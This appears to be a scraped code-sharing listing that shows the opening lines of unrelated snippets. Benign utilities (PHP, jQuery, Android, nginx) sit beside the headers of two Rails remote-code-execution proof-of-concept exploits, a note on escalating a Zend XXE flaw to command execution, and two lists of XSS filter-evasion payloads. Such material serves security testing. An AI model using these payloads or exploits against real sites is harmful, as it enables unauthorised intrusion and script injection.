This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
This function saved my life. | |
found on: http://www.sitepoint.com/forums//showthread.php?t=438748 | |
by: crvandyke | |
It takes an object, and when all else if/else/recursive functions fail to convert the object into an associative array, this one goes for the kill. Who would'a thunk it?! | |
*/ | |
$array = json_decode(json_encode($object), true); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* jQuery.ajaxQueue - A queue for ajax requests | |
* | |
* (c) 2011 Corey Frang | |
* Dual licensed under the MIT and GPL licenses. | |
* | |
* Requires jQuery 1.5+ | |
*/ | |
(function(a){var b=a({});a.ajaxQueue=function(c){function g(b){d=a.ajax(c).done(e.resolve).fail(e.reject).then(b,b)}var d,e=a.Deferred(),f=e.promise();b.queue(g),f.abort=function(h){if(d)return d.abort(h);var i=b.queue(),j=a.inArray(g,i);j>-1&&i.splice(j,1),e.rejectWith(c.context||c,[f,h,""]);return f};return f}})(jQuery) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt | |
into a Remote Command Execution: | |
NOTE: It relies on the PHP expect module being loaded | |
(see http://de.php.net/manual/en/book.expect.php) | |
joern@vbox-1:/tmp$ cat /var/www/server.php | |
<? | |
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php"); | |
Zend_Loader_Autoloader::getInstance(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# | |
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156) | |
# | |
# ## Advisory | |
# | |
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion | |
# | |
# ## Caveats | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# | |
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333) | |
# | |
# ## Advisory | |
# | |
# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo | |
# | |
# ## Caveats | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import android.content.Context; | |
import android.content.pm.PackageInfo; | |
import android.content.pm.PackageManager; | |
import android.content.pm.PackageManager.NameNotFoundException; | |
import android.content.pm.Signature; | |
public class TamperCheck { | |
//we store the hash of the signture for a little more protection | |
private static final String APP_SIGNATURE = "1038C0E34658923C4192E61B16846"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function getIPRangeByCIDR($cidr) { | |
// Making sure IPs are valid | |
$ipdata = explode('/', ltrim($cidr, '0')); | |
$dotcount = substr_count($ipdata[0], '.'); | |
if ($dotcount != 3) { | |
$ipdata[0] .= str_repeat('.0', (3-$dotcount)); | |
} | |
$cidr_address = sprintf('%s/%s', $ipdata[0], $ipdata[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This configuration file is provided on an "as is" basis, | |
# with no warranties or representations, and any use of it | |
# is at the user's own risk. | |
user www-data; | |
worker_processes 4; | |
pid /run/nginx.pid; | |
events { | |
worker_connections 768; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div style="color:rgb(''�x:expression(alert(1))"></div> | |
<img/src=%00 id=confirm(1) onerror=eval(id) | |
<div id=confirm(1) onmouseover=eval(id)>X</div> | |
<span/onmouseover=confirm(1)>X</span> | |
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83))) |
OlderNewer